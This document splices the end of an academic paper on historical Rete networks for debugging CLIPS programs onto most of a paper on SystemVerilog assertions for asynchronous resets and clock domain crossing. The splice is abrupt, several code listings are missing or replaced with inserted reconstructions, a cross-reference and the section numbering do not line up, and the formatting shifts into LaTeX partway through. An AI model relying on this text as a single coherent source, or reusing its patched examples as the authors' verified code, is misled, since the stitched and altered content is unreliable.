When we are done checking all of rule \( X \)’s production node’s instantiations, the list of eligible instantiations built will determine what we do next. If this list is empty, then rule \( X \) did not fire because it was not eligible to fire at that time; we should next determine what LHS conditions were not satisfied then. If this list is not empty, then rule \( X \) did not fire because none of its instantiations were on top of the agenda right before time \( T \); we should next determine, in this case, why other instantiation(s) preceded rule \( X \)’s instantiations on the agenda.
If the rule was not eligible to fire at time \( T \), we will traverse the historical Rete network backwards from rule \( X \)’s production node, searching the nodes corresponding to rule \( X \)’s LHS conditions. These alpha and beta memory nodes will be searched for instantiations...
current at time $T$: both current and past partitions of each node will be searched, and each instantiation's time-tag will be checked to see if $T$ lies within any of its intervals.
If a beta node is found to have no instantiations that were true at time $T$, then the corresponding inter-condition test was not satisfied then. Likewise, if an alpha node is found to have no instantiations that were true at that time, then no fact matched this LHS condition then. Eventually, in this way, we build a list of unsatisfied LHS conditions and inter-condition tests, and this list will be used in constructing the answer, so that the system builders will know which conditions of rule $X$ were not satisfied at time $T$; these need to be satisfied, if rule $X$ is to even be eligible to fire then.
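The interval test at the heart of this backwards traversal can be sketched as below; the representations are assumptions, with open intervals using None as their end.

```python
def true_at(intervals, T):
    # An interval (a b) contains T when a <= T <= b; an open interval
    # (a *) contains every T >= a.
    return any(a <= T and (b is None or T <= b) for a, b in intervals)

def unsatisfied_at(node_contents, T):
    # node_contents: LHS condition -> all time-tag intervals gathered
    # from both partitions of its alpha (or beta) memory node.
    return [cond for cond, ivs in node_contents.items() if not true_at(ivs, T)]

nodes = {"(goal ?g)": [(0, None)], "(blocked ?g)": [(2, 5)]}
print(unsatisfied_at(nodes, 6))  # ['(blocked ?g)']
```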
In the case that the rule was eligible to fire at time $T$, we could simply report what rule instantiation did fire then; however, that would not give such potentially-useful information as, for example, just where in the agenda rule $X$’s instantiations were at time $T$. We can gather additional details in the following way. First, we reconstruct a copy of the agenda from right before time $T$, using the already-discussed agenda reconstruction algorithm. Then, we search down the agenda copy from the top to find out how far down the agenda the highest instantiation of rule $X$ was, and also how many of the instantiations above rule $X$’s highest one had higher saliences; such instantiations will always be chosen to fire before rule $X$’s, if all are on the agenda concurrently. The remainder of the instantiations above rule $X$’s highest one are there because they joined the agenda more recently — for rule $X$ to fire before these, those rules will have to be instantiated earlier, or rule $X$ will have to be instantiated later. If there are too many instantiations above rule $X$’s to readably present them all to the system builders, then we can still at least tell them how many were above it, and how many of those had higher salience; and we should include the instantiation on the agenda top, and its salience, in any case.
In these examples, the historical information in the historical Rete network and associated data structures makes obtaining specific details about a run straightforward and reasonable. This will help a great deal in developing a practical system for answering questions such as the above. Storing historical information within the network makes it easy to update as the run proceeds, and leaves it where it can be easily obtained for different kinds of debugging purposes — such as different kinds of questions — after the run concludes. With the system able to answer such questions, the system builder will be able to easily obtain historical information about a run.
V. CONCLUSIONS AND FUTURE WORK
We have proposed that historical information about a run of a CLIPS program be stored within a historical Rete network used to match CLIPS rules' LHS's to working memory facts. This paper has explained how a Rete network can be modified for this purpose, and how the historical information thus stored can subsequently be used by a question-answering system to be designed to help with debugging a CLIPS program.
It should be feasible to store and maintain this historical information without degrading CLIPS run-time performance too badly. In fact, it is noteworthy that it can be integrated so easily into the Rete network. The basic Rete propagation is almost unchanged; the only additions involve peripheral actions such as appending time-tags, and moving no-longer-true instantiations from current to past partitions. Using hashing in various places, the time to perform these additional duties should be quite reasonable. Keeping an agenda-changes list as well will also allow reasonable agenda reconstruction whenever the system builder (or question-answering system) needs a past agenda state.
Maintaining this information is a necessary first step for providing explanation to help with debugging CLIPS, since CLIPS, being a forward-chaining language, requires temporal information to determine why a program behaved as it did. Such explanation will reduce the tedium for system builders, reducing the time they must spend examining system traces or single-stepping through a program to find out if or when something occurred.
Future work will include actually implementing these ideas, to see if integrating this information into the Rete network works as well in practice as it appears that it should in principle. Such investigation may also reveal ways to reduce the space needed to store historical data. Then, we will build the question-answering system described, on the top-level of CLIPS. We will determine what types of questions are useful for debugging CLIPS programs, and will design a system that can answer such questions, using the historical information stored in the historical Rete network and associated data structures. Empirical experiments will also be needed for evaluating the effectiveness of the resulting explanations in helping with debugging. Both debugging and testing require knowledge of what has occurred during a program run — therefore, additional future work may also include using this stored historical information in the development of further testing and debugging tools for CLIPS programs. As the size of CLIPS programs increases, such software engineering tools will become more and more necessary. These methods for maintaining and storing run history, and the explanation that they will facilitate, should help in developing these future CLIPS programs.
ABSTRACT
Most digital designs inherently possess asynchronous behaviors of some kind. While the SystemVerilog assertion (SVA) language offers some asynchronous controls like disable iff, writing concurrent assertions that accurately describe asynchronous behavior is not so straightforward. SVA properties require a clocking event, making them innately synchronous. When describing asynchronous behavior, the behavior of interest typically occurs after the asynchronous trigger appears. Unfortunately, SystemVerilog scheduling semantics make this rather difficult to check because the assertion input values are sampled before the trigger occurs. This often leads assertion writers to sampling using clocks, which may not guarantee matching and optimal checking in all cases. Alternatively, there are some simple approaches for describing asynchronous behavior using SVA that this paper explores. The SystemVerilog scheduling semantics are described along with the difficulties they pose for checking asynchronous behavior. Traditional approaches are considered such as synchronizing to a clock, but better asynchronous alternatives are suggested and practical examples provided. In addition, some practical solutions are offered for other asynchronous behaviors like asynchronous communication between clock domains or across bus interfaces. Lastly, this paper considers the various changes and additions to the recently published IEEE 1800-2009 standard, which may simplify checking asynchronous behavior.
Categories and Subject Descriptors
B.6.3 [Logic Design]: Design Aids – automatic synthesis, hardware description languages, optimization, simulation, switching theory, and verification.
General Terms
Languages, Verification.
Keywords
Assertion, asynchronous, SystemVerilog, SVA, SystemVerilog Assertions, clock domain crossing, asynchronous handshaking, delay, trigger, clock handover, scheduling semantics, simulation regions, Preponed, Active, NBA, non-blocking assignment, Observed, Reactive, expect, programs, clocking block, immediate assertions, concurrent assertions, procedural concurrent assertions, deferred assertions, checkers, multi-clock sequences, abort properties, disable, property, sequence.
1. INTRODUCTION
Asynchronous behaviors still find their way into almost every design whether it operates synchronously or not. For example, designs use asynchronous reset controls or respond to asynchronous inputs like non-maskable interrupts, enables, or other asynchronous controls. Not uncommonly, interface protocols use asynchronous handshakes, and multiple clocks in a design cause asynchronous communication between clock domains. Therefore, it is just as necessary to adequately test the asynchronous behaviors in a design as it is the synchronous ones.
SystemVerilog assertions (SVA) are an ideal choice for writing checkers given the rich temporal syntax provided by the language. However, they operate synchronously by nature because they sample relative to a sampling event (such as a clock) and because of the SVA scheduling semantics described in the IEEE 1800-2005 SystemVerilog standard[3], making SVA a little tricky to use for describing asynchronous behaviors. Asynchronous behaviors usually fall into two categories: (1) asynchronous control, and (2) asynchronous communication. SystemVerilog assertions can be used for either, but each presents its own set of challenges. In the following section, both types of asynchronous behaviors are considered along with the difficulties of describing them using SVA, and practical examples and solutions to resolve these difficulties. In section 3, the latest additions and modifications to the SystemVerilog 2009 standard[4] that aid asynchronous assertion writing are considered, followed by a brief summary of the recommended practices and solutions presented in this paper.
2. ASYNCHRONOUS BEHAVIORS
2.1 Asynchronous controls
The most common form of asynchronous behavior found in nearly every design is asynchronous control. For purposes of discussion, consider the following up-down counter example:
```verilog
module Counter (input Clock, Reset, Enable, Load, UpDn,
                input [7:0] Data,
                output logic [7:0] Q);
  always @(posedge Reset or posedge Clock)
    if (Reset)
      Q <= 0;
    else
      if (Enable)
        if (Load)
          Q <= Data;
        else
          if (UpDn)
            Q <= Q + 1;
          else
            Q <= Q - 1;
endmodule
```
As one might expect, this counter has an asynchronous reset to initialize the module upon power-up or system reset. The counter's behavior is defined in Table 1.
<table>
<thead>
<tr><th>Reset</th><th>Clock</th><th>Enable</th><th>Load</th><th>UpDn</th><th>Data</th><th>next Q</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>-</td><td>-</td><td>-</td><td>-</td><td>-</td><td>0</td></tr>
<tr><td>0</td><td>rise</td><td>0</td><td>-</td><td>-</td><td>-</td><td>unchanged</td></tr>
<tr><td>0</td><td>rise</td><td>1</td><td>1</td><td>-</td><td>Data</td><td>Data</td></tr>
<tr><td>0</td><td>rise</td><td>1</td><td>0</td><td>0</td><td>-</td><td>Q-1</td></tr>
<tr><td>0</td><td>rise</td><td>1</td><td>0</td><td>1</td><td>-</td><td>Q+1</td></tr>
</tbody>
</table>

Table 1. Up-down counter truth table.
Using concurrent SystemVerilog assertions, checkers can be easily written to cover the functionality in the counter truth table. For example, several assertions could be written as follows:
```verilog
default clocking cb @(posedge Clock);
endclocking

// Enable
assert property ( !Enable |=> Q == $past(Q) );
// Load of data
assert property ( Enable && Load |=> Q == $past(Data) );
// Up counting
assert property ( Enable && !Load && UpDn |=> Q == $past(Q)+8'b1 );
// Down counting
assert property ( Enable && !Load && !UpDn |=> Q == $past(Q)-8'b1 );
```
2.1.1 Disable iff
These concurrent assertions are fairly straightforward; however, they neglect the effect of an asynchronous reset during the assertion evaluation. If a reset occurs, these checks may immediately become invalid. A common mistake is to place the asynchronous control signal in the precondition (also referred to as the antecedent) of the assertion. Adding the asynchronous control into the assertion's precondition stops the evaluation of any new assertion threads, but it fails to affect any existing assertion threads. For example, Figure 1 shows how adding the reset to the precondition seems like it will work, but actually results in false failures.
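As a sketch of this mistake (hypothetical, modeled on the load assertion above rather than on Figure 1 itself), the flawed form would look like:

```verilog
// Flawed: !Reset in the antecedent only blocks NEW evaluation
// attempts while Reset is high; a thread started before Reset
// rose still runs to completion and can falsely fail.
assert property ( @(posedge Clock)
  !Reset && Enable && Load |=> Q == $past(Data) );
```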
The most appropriate approach to cope with the asynchronous reset is to use the SystemVerilog disable iff construct. Disable iff provides a level-sensitive control to automatically stop new assertion evaluations and terminate active threads. To fix the assertions in this example, each assertion should have an abort condition specified by adding a disable iff clause in order to work properly in all situations:
```verilog
// Enable
assert property ( disable iff(Reset)
  !Enable |=> Q == $past(Q) );
// Load of data
assert property ( disable iff(Reset)
  Enable && Load |=> Q == $past(Data) );
// Up counting
assert property ( disable iff(Reset)
  Enable && !Load && UpDn |=> Q == $past(Q)+8'b1 );
// Down counting
assert property ( disable iff(Reset)
  Enable && !Load && !UpDn |=> Q == $past(Q)-8'b1 );
```
2.1.2 Checking asynchronous events
While disable iff handles asynchronous assertion termination, what if the asynchronous behavior is the thing to be checked? In the simple counter example, one check is missing—does Q go to 0 immediately upon reset? Since concurrent assertions require a sampling event, one might be tempted to write a concurrent assertion as follows:
assert property(@(posedge Reset) Reset |=> Q == 0 );
At first glance, this looks like it works because Q is being checked for 0 after the reset signal occurs. However, that is not actually the case. In order to understand what is happening, the SystemVerilog scheduling semantics need to be considered.
**Guideline 1: Always use disable iff to asynchronously terminate active assertion threads.**
Before SystemVerilog, a Verilog simulation only had a few scheduling regions: active, inactive, non-blocking assignment (NBA), and the monitor/strobe regions. All blocking assignments and statements are scheduled in the active region, while non-blocking assignments are scheduled to evaluate later after all active assignments and statements have been executed. This gives non-blocking assignments their characteristic behavior of updating at the end of a simulation time slot.
SystemVerilog, on the other hand, has greatly expanded the number of simulator regions in order to evaluate correctly the new constructs introduced like assertions, clocking blocks, and programs. The Preponed region was introduced to properly handle assertions. As simulation time advances, the Preponed region is at the beginning of each new simulation time slot and proceeds before any events or assignments are generated from always or initial blocks (see Figure 2). The SystemVerilog standard requires that all values used to evaluate concurrent assertions must be sampled during the Preponed region ([3], section 17.3). This means that the values are always sampled before any sampling event triggers the assertions to evaluate, making all assertions synchronous to the sampling event and avoiding any changes or metastability issues on the assertion inputs.
Unfortunately, the way the concurrent assertion semantics are defined makes it difficult to check asynchronous behavior during the same time slot as the asynchronous event. In the simple counter example, the assertion above will never succeed for two reasons. First, the precondition checks to see if Reset is 1, which seems sensible since a posedge Reset triggers the assertion. However, assertions use input values sampled in the Preponed region, or the value just before the posedge of Reset occurs; i.e., a value of 0. Since Reset equals 0, the precondition always evaluates false. A way to work around this would be to set the precondition to true in order to force the check:
```
assert property (@(posedge Reset) 1 |-> Q == 0);
```
Using this precondition causes the assertion to evaluate, but raises a second issue. As with the Reset value, the value of Q will always be the value before the posedge of Reset. Considering the simple up-down counter, Q is reset to 0 using a non-blocking statement, which means that Q does not update until the NBA region long after Q is sampled in the Preponed region. Figure 3 illustrates this point. The assertion could be re-written to use `@(negedge Reset)` instead, but the behavior of Q during reset might be unstable and that would never be detected by the check.
The solution to the problem is to sample the input values at a different simulation time. Therefore, the key to checking asynchronous behavior after an asynchronous control is to delay either the evaluation of the check or the sampling of the assertion inputs. There are many ways to accomplish this and the following offers some possible solutions.
**Guideline 2: The key to checking asynchronous behavior is to delay either the evaluation of the checking or the sampling of the assertion inputs.**
**2.1.2.1 Synchronously checking**
The most common way to check asynchronous behavior is to synchronously sample the assertion inputs. While this is usually sufficient, it is essentially a “cheat” and lacks the assurance that all behavior has been thoroughly checked (see Figure 4).
```
assert property (@(posedge Reset) 1 |-> Q == 0);
assert property (@(posedge Clock) Reset |-> Q == 0);
```
**Figure 4. Synchronously sampling asynchronous behavior.**
Sometimes, the clock frequency may not be fast enough to sample the asynchronous behavior so an oversampling fast clock could be
used. Often, this is used with hardware emulators or to catch glitches that occur on the asynchronous signals. Even so, it is the author’s opinion that synchronous sampling of asynchronous behavior should only be used when necessary since there are better asynchronous ways to write checkers that do not open the possibility of missing spurious transitions between sampling events.
2.1.2.2 Immediate assertions
Immediate assertions have the advantage that they evaluate at the point that they are executed whichever simulation region that may be. Using immediate assertions, the asynchronous reset assertion could be written as:
```verilog
always @(posedge Reset) assert (Q == 0);
```
As with the earlier concurrent assertion example, this looks like it should work; however, again there is the issue of when the immediate assertion evaluation takes place. Immediate assertions execute by default in the Active scheduler region. In the design, Q is updated by a non-blocking assignment, so it changes in the NBA region, after the assertion check has already evaluated.
Considering Figure 2, the only way for the checking of Q to evaluate correctly is for the assertion to execute in either the Observed, Reactive, Re-inactive, or Postponed regions, since they all evaluate after the design has updated the value of Q in the NBA region. The Postponed region is only available to PLI routines (like $monitor and $strobe) or clocking block sampling, leaving the Observed, Reactive, and Re-inactive regions to evaluate the assertion. There are several easy ways to accomplish this: use (1) a program block, (2) a sequence event, (3) the expect statement, (4) a non-blocking event trigger, or (5) a clocking block.
2.1.2.2.1 Program blocks
Program blocks are designed intentionally to execute after all events are evaluated in the design in order to avoid race conditions between the testbench and the design. A program block’s inputs are sampled in the Observed region, and any initial blocks within a program are scheduled to execute in the Reactive region ([3], section 16.3). By placing the immediate assertion in a program, Q will have the reset value when the check is evaluated.
```verilog
program tester;
initial forever
@(posedge Reset) assert (Q == 0)
else $error("Q != 0 after reset!");
endprogram
```
Note, program blocks can be nested inside of modules or interfaces so that they have visibility to signals in the local scope, but not all simulators support nested programs. Thus, one disadvantage to this approach is that it requires hierarchical references to probe the design signals, unless the program is bound (using bind) into the design hierarchy.
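Hypothetically, binding such a program into the design might look like this (the instance name is illustrative, not from the paper):

```verilog
// Bind the tester program into every instance of Counter so
// that Reset and Q resolve in the Counter scope directly.
bind Counter tester tester_inst();
```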
2.1.2.2.2 Sequence events
A sequence event is an alternate approach to using programs. Sequences define a series of temporal events and can be used to block the execution of statements until the sequence has been matched. The SystemVerilog standard defines that the end-point status for a sequence is set in the Observed region of simulation. Therefore, waiting upon the completion of a sequence, either by using a sequence method like .ended, .matched, or .triggered, or by using @(sequence), delays the execution of subsequent statements until after the Observed region ([3], sections 10.10.1 and 17.12.6).
For example, the same reset check could be written as:
```verilog
sequence reset_s;
@(posedge Reset) 1;
endsequence
always @(reset_s) assert (Q == 0);
```
The advantage of using sequence events is that each asynchronous control can be defined as a named sequence and then used appropriately in any always or initial block in modules, interfaces, or programs. Sequence events provide a great alternative to delay assertion input sampling, but be aware that not all simulation tools fully support them yet.
2.1.2.2.3 Expect statements
Perhaps providing the best compromise between immediate and concurrent assertions is the SystemVerilog expect statement. Expect is a procedural statement for use within always or initial blocks, but it also understands the temporal property syntax available to concurrent assertions. For example, an expect statement can use properties such as this:
```verilog
initial
expect(@(posedge clk) a ##1 b ##1 c) else $error;
```
Fortunately, expect is a great construct for checking asynchronous behaviors. The SystemVerilog standard states that the statement after expect is executed after the Observed region ([3], section 17.16). Therefore, using expect, immediate assertions can be executed after the Observed region as follows:
```verilog
always
expect(@(posedge Reset) 1) assert (Q == 0);
```
Unfortunately, not all major simulators execute the expect statement and subsequent statements after the Observed region. To compensate, the assertion evaluation can be delayed to at least the NBA or Observed region by waiting for the change to occur on Q:
```verilog
always
expect(@(posedge Reset) 1) @Q assert (Q == 0);
```
However, waiting for Q to change may be problematic. For instance, if Q is already 0 when Reset occurs, then the assertion would fail to check until the first non-zero change of Q, resulting in a false failure. Instead, the expect statement can be placed inside of a program block to delay the sampling of the assertion inputs:
```verilog
...
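The elided code might look something like the following (a reconstruction based on the program-block example in 2.1.2.2.1, not the author's exact listing):

```verilog
program tester;
  // expect evaluates after the Observed region, and the
  // program's inputs are sampled there as well, so Q already
  // holds its post-reset value when the check runs.
  initial forever
    expect( @(posedge Reset) 1 ) assert ( Q == 0 );
endprogram
```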
2.1.2.2.4 Non-blocking event trigger
Another trick to delay the sampling of an immediate assertion’s inputs is to use a non-blocking event trigger (->>). Traditional Verilog provides an event trigger (->) that is evaluated immediately and only for the current simulation time step. The non-blocking event trigger delays its evaluation to the non-blocking assignment (NBA) region of the current or future time step. In the counter example, Q is updated in the NBA region using a non-blocking assignment. By waiting for a non-blocking event trigger, the assertion is also delayed until the NBA region. For example,
```verilog
always @(posedge Reset)
begin
  event t;
  ->> t;                  // non-blocking trigger: matures in the NBA region
  @(t) assert ( Q == 0 );
end
```
However, this non-blocking trigger evaluates during the same simulation time as the RTL is resetting Q, which essentially creates a race condition depending on the order in which the simulator evaluates the two processes. In some simulators, the non-blocking trigger always occurs at the appropriate time after the RTL has been updated; in others, it depends on whether the assertion is co-located with the RTL code or in a separate module.

In order to guarantee correct input sampling, a #0 delay can be placed before the assertion so that the assertion is further delayed until the RTL has finished evaluating:
```verilog
always @(posedge Reset)
begin
  event t;
  ->> t;                      // non-blocking trigger
  @(t) #0 assert ( Q == 0 );  // #0 defers past any remaining Active events
end
```
As the simulator processes the NBA events, they are promoted to the Active region where they are evaluated as shown in Figure 5:
Figure 5. Verilog indeterminacy does not affect the assertion evaluation when using a non-blocking trigger and #0 delay.
The assertion is further delayed to the Inactive region, causing the RTL assignment to Q to always evaluate beforehand, regardless of the order in which the non-blocking events were scheduled. Using the #0 delay, the race condition between non-blocking events is eliminated and the assertion can be placed either in the RTL code or elsewhere. Incidentally, until recently not all major simulators supported non-blocking event triggering, but the latest versions generally have good support.
2.1.2.2.5 Clocking blocks
Clocking blocks can delay the sampling of inputs used in immediate assertions. By default, clocking blocks sample using #1step, which is equivalent to the Postponed region of the previous time slot or the Preponed region of the current one. Sampling can be delayed until the Observed region by specifying the input delay as #0 instead. By using a clocking block input in the immediate assertion, the value of Q will already be updated from the asynchronous reset:
```verilog
clocking cb @(posedge Reset);
  input #0 Q;   // Delay sampling until the Observed region
endclocking

always @(posedge Reset)
  assert ( cb.Q == 0 );
```
Notice that the clocking block samples with respect to the asynchronous reset. Because the input delay is specified as #0, the value used for Q comes from the Observed region, after the updated RTL reset value was set in the NBA region.

Using the reset as the clocking block’s sampling event creates a potential race condition between updating the clocking variable cb.Q and sampling cb.Q from the assertion the first time Reset occurs. Assuming Q is 4-state and the assertion process evaluates first, an erroneous value of X will be sampled before the clocking variable cb.Q is updated, resulting in a false failure. With some simulators, it is enough to wait on the clocking block before evaluating the assertion like this:
```verilog
always @(posedge Reset)
  @cb assert ( cb.Q == 0 );
```
Given the possibility of a false failure, this method should be used with care.
**Guideline 3: Immediate assertions can check asynchronous events if evaluated in the Observed or Reactive simulation regions.**
2.1.2.3 Concurrent assertions
While concurrent assertions sample synchronously and so have a disadvantage when used for asynchronous checking, there are a few tricks to make them work without resorting to sampling off a clock. As previously discussed, the key to checking asynchronous behaviors is to delay the checking or the sampling of the inputs. Clocking blocks cannot be used as with immediate assertions because the SystemVerilog standard explicitly states that clocking block inputs used by concurrent assertions must be sampled using \#1step, not #0 ([3], section 17.3). Nonetheless, there is still a way to delay the input sampling or the assertion checking by delaying the sampling trigger or calling subroutine methods using matched sequences.
2.1.2.3.1 Delays in asynchronous control
While it may seem like “cheating,” just like sampling using a clock, delaying the asynchronous control signal slightly to allow the RTL to finish evaluation is really one of the easiest and simplest approaches to checking asynchronous behavior. In the counter example, the original concurrent assertion can be used, but with the Reset signal delayed just enough for the RTL to reset the value of Q:
```verilog
assign #1 trigger = Reset;
assert property( @(posedge trigger) 1 |-> Q==0);
```
Since there is no unit specified with #1, the delay will be one simulation time unit. Normally this is sufficient, but the smallest precision time unit could also be used. Some simulators allow the use of the #1step keyword, which represents the global time precision:
```verilog
assign #1step trigger = Reset;
assert property( @(posedge trigger) 1 |-> Q==0);
```
Using #1step guarantees that no action is missed between the time slot in which Reset occurs and when the value of Q is reset. Not all simulators implement #1step, so a hard-coded value is usually adequate.³ Note that using a delay with a continuous assignment statement is easiest, but a separate process could also be used to delay Reset or to create a named event that triggers the assertion evaluation.
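As a sketch of the named-event alternative mentioned above (hypothetical; the event name and delay value are illustrative):

```verilog
// Delay the trigger with a separate process instead of a
// delayed continuous assignment.
event trigger_e;
always @(posedge Reset) #1 -> trigger_e;
assert property ( @(trigger_e) 1 |-> Q == 0 );
```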
2.1.2.3.2 Calling subroutines on matched sequences
While the SystemVerilog standard restricts the sampling of concurrent assertion inputs to the Preponed region (i.e., the value before the sampling event), it does not restrict the sampling of the inputs used by tasks or functions called by an assertion sequence. In fact, a subroutine called by a sequence is specifically defined to evaluate in the Reactive region ([3], section 17.9), allowing the inputs to be sampled after the RTL design has finished updating from any asynchronous events.
For example, consider the following task:
```verilog
task automatic check( ref logic [7:0] data,
input logic [7:0] value );
assert ( data == value );
endtask
```
The check() task accepts any 8-bit variable or wire and compares it to value. Notice that data is passed using ref, which is important because otherwise the Preponed value will be passed. Since ref is required, the task must be automatic to work properly in some simulators. Now the task can be called in a concurrent assertion in the following manner:
```verilog
assert property( @(posedge Reset) 1 |->
(1, check( Q, 0 )));
```
or in a named sequence:
```verilog
sequence check_q_eq_0;
(1, check( Q, 8'b0 ));
endsequence
assert property( @(posedge Reset) 1 |->
check_q_eq_0);
```
Because the task is evaluated in the Reactive region, the value of Q is read at that time, giving the updated RTL value after the asynchronous reset occurs. The same could be done with a function, but not all simulators evaluate functions or sample their inputs in the Reactive region as the standard specifies. Nonetheless, a generally portable solution is as follows:
```verilog
function bit check_q( input logic [7:0] value );
return ( Q == value );
endfunction
assert property( @(posedge Reset) 1 |->
check_q( 0 ));
```
or using a named sequence:
```verilog
sequence check_q;
check_q( 0 );
endsequence
assert property( @(posedge Reset) 1 |-> check_q );
```
The drawback to this approach is that the variable (or wire) being checked cannot be passed as an argument but must be hard coded inside the function so that it is sampled at the appropriate time. As a result, using the task version is a more flexible and preferable solution.
---
3 One major simulator disallows #1step outside of a clocking block, but allows the non-standard use of #step in an assignment statement to accomplish the same result.
The assertion could have been written using @(posedge Q), but simulation tools might interpret this as a non-zero Q[0] or the entire vector Q. Instead, a more cautious approach is to detect a negedge transition using the true/false expression result of (Q==0).
2.1.3.2 Timing simulations
Delaying the input sampling on an asynchronous assertion works as long as there are no timing delays in the design RTL. Most of the methods shown in this section evaluate the assertions at the same simulation time as the asynchronous control signal occurs, which would not work with a design that includes delays, such as a gate-level netlist. In this case, several easy options exist that could be used to delay the assertion checking long enough for Reset to propagate through the design and Q to be updated:
1. Sample synchronously as shown in 2.1.2.1:
```verilog
assert property (
  @(posedge Clock) Reset |-> Q == 0 );
```
2. Delay the asynchronous control signal as shown in 2.1.2.3.2:
```verilog
parameter gatedelay = 10;
...
assign #gatedelay trigger = Reset;
assert property ( @(posedge trigger) 1 |-> Q == 0 );
```
3. Delay the assertion checking a fixed amount of time:
```verilog
always @(posedge Reset)
  #gatedelay assert ( Q == 0 );
```
OR
```verilog
always @(posedge Reset) begin
  @Q assert ( Q == 0 );
end
```
4. Delay the assertion checking until the RTL changes:
```verilog
program tester;
  initial forever
  begin  // Signals visible to program
    @Q assert ( Q == 0 && Reset );
  end
endprogram
```
Option 1 generally works provided Reset lasts longer than one clock period; a fast sampling clock could also be used. Options 2 and 3 generally work, but may require some trial and error to find the correct sampling delays that work.
Option 4 is essentially immune to timing delays since it triggers on events, but poses its own set of difficulties. First, if Q already equals 0, then the assertion never performs its check (this is required if Q equals 0 to prevent a false failure occurring when Reset is released and Q starts changing). Second, in a gate-level simulation glitches may occur on Q resulting in false failures. Third, a concurrent assertion cannot be used for this check since the value of Q will be sampled in the Preponed region instead of after the RTL has updated Q; therefore, the assertion needs to be delayed using a program block or other method previously discussed in order to correctly sample the assertion’s input value(s). Fourth, there is no guarantee that Q actually changes on the same Reset that triggered the evaluation! If Q fails to change and Reset is de-asserted and re-asserted, then the assertion may not check the value of Q until a subsequent occurrence of Reset.
5. Create a multi-clocked sequence:
```verilog
parameter TIMEOUT = 2;
assert property ( @(posedge Reset) 1 |=>
  @(posedge Clock) ##[1:TIMEOUT] Q == 0 && Reset
);
```
Probably the best compromise is Option 5—sampling using the clock once the Reset triggers the assertion evaluation. Instead of waiting for Q to change, a parameterized timeout value can be specified so if Q never changes before Reset de-asserts then an error is flagged. This allows the use of a concurrent assertion, and changing the timeout number of clock edges to sample is much simpler than adjusting hard-coded timing delays anytime the gate-level netlist changes. This type of assertion is referred to as a multi-clocked sequence and is discussed in detail in the next section.
**Guideline 5: For timing simulations, synchronously checking the design’s behavior upon the asynchronous event is probably the best overall solution.**
2.2 Asynchronous communication
The second major category of asynchronous behavior is asynchronous communication. In most designs, asynchronous communication commonly occurs between two independent clock domains or with an asynchronous interface protocol. Checking asynchronous communication is usually easier than checking asynchronous controls because the signals or data being checked are typically set up and ready for sampling before the sampling event occurs. The exception occurs between clock domains when the independent clocks happen to occur at the exact same simulation time. While this may be unlikely, even if it does happen it is usually not a problem because sampling is simply delayed to the next clock edge; with asynchronous controls, by contrast, there is no following control signal to perform the sampling, so other methods are required such as those outlined in the preceding sections.
The SystemVerilog standard has extensively defined the semantics for multi-clock support, which can be used to sample events across clock domains as well as asynchronous protocols. The basic principles will be presented here; however, refer to [3] for more specific and in-depth details.
2.2.1 Clock domain crossing
The first type of asynchronous communication to consider is clock domain crossing. The key to building multi-clocked sequences is the concatenation operator ##1: in a singly clocked sequence it represents a delay of one clock cycle, while in a multi-clocked sequence it joins two differently clocked subsequences.
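The code example the following discussion refers to is missing from the extracted text; a minimal reconstruction (assuming the names sig_a, sig_b, clk1, and clk2 that the discussion uses) would be:

```verilog
// Multi-clocked sequence: sig_a is sampled on clk1, then ##1
// hands the clock over so sig_b is sampled on clk2.
sequence cross_s;
  @(posedge clk1) sig_a ##1 @(posedge clk2) sig_b;
endsequence
```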
Here, sig_a is sampled using clk1 and sig_b using clk2. The ##1 joins the two differently clocked sequences together, also known as clock handover (see Figure 7). In fact, it is illegal to use ##0, ##2, or any other cycle delay operator besides ##1. Likewise, the non-overlapping implication operator can be used between differently clocked sequences, but the overlapping implication operator is not allowed. The clock flows through an implication operator and sequence until another sampling clock is encountered.
Figure 7. Example of using ##1 clock handover between differently clocked sequences.

The concatenation operator also requires that clk2 is strictly subsequent, i.e., not occurring at the exact same simulation time slot as clk1. If it does, then sig_b will not be sampled until the next subsequent occurrence of clk2.

Using clock handover when crossing clock domains seems rather straightforward, but the duration of ##1 may be arbitrarily short, which may not provide the setup and hold time necessary to avoid timing hazards. Consider the scenario in Figure 8 where the strobe signal is generated in the src_clk domain and must be stable for at least 3 cycles in the dst_clk domain. An assertion must check that the strobe signal remains stable, but also that it has adequate setup and hold time to be sampled in the dst_clk domain.

Figure 8. ##1 is arbitrarily short so timing hazards may occur.
One possible solution would be to describe the \texttt{strobe} signal in both clock domains and match the two sequences together. The \texttt{intersect} operator can easily accomplish this, but the beginning and end points must occur at the same time or with the same starting and ending clocks. Using \texttt{intersect}, the assertion can be described as:
\begin{verbatim}
assert property (
  @(posedge src_clk) $rose(strobe) |-> (
    strobe[*1:$] ##1 1
  )
  intersect (
    ##1 @(posedge dst_clk) strobe[*3] ##1
    @(posedge src_clk) 1
  )
);
\end{verbatim}
Since the \texttt{intersect} operator requires the same end points, the additional \#\#1 is appended to the \texttt{src\_clk} sequence so that it can match the end of the \texttt{dst\_clk} sequence. Likewise, the \texttt{dst\_clk} sequence switches to the \texttt{src\_clk} domain to complete its sequence, giving it the same ending point as the \texttt{src\_clk} sequence. Figure 9 illustrates how the two sequences synchronize together. The assertion satisfies both the stability and timing checks since the sequences combined ensure that the \texttt{strobe} signal remains asserted for the required number of cycles. For a more in-depth discussion on clock domain crossing and jitter as well as an example of a multi-clocked asynchronous FIFO, refer to [5].
Figure 9. Assertion for clock domain crossing.
\textbf{Guideline 6:} The key to writing assertions for clock domain crossing is proper understanding and handling of the clock handover using \texttt{|=>} or \#\#1.
\subsection*{2.2.2 Asynchronous interface protocols}
An asynchronous interface protocol is one that either sends information without an accompanying clock or one that uses an asynchronous handshaking mechanism. While the interface may be asynchronous, the design will still use a clock to sample the asynchronous data or transfer the information over the interface. Because a clock is used, writing assertions for asynchronous interfaces can be as simple as writing a synchronous property, or at worst a multi-clocked sequence since the handshaking signals can be treated like different sampling clocks. With handshaking, the data is setup beforehand so sampling the data is typically not an issue as discussed previously with asynchronous control signals.
\subsubsection*{2.2.2.1 Serial UART Interface Example}
A classic example of an asynchronous protocol is the universal asynchronous receiver / transmitter, commonly known as a UART. More recent UARTs support synchronous transfers, but they still support asynchronous data transfer. The protocol requires that the receiver and transmitter agree beforehand on the baud rate, and then both set their internal clocks to the same frequency.
The protocol is considered asynchronous because no clock signal is transmitted with the data. The sampling of the data is accomplished by using a fast clock to detect the start of the transfer, and then generate a sampling clock from the fast clock that samples in the middle of each data bit. A simple ready-to-send (RTS) and clear-to-send (CTS) handshaking is used to start the data transfer.
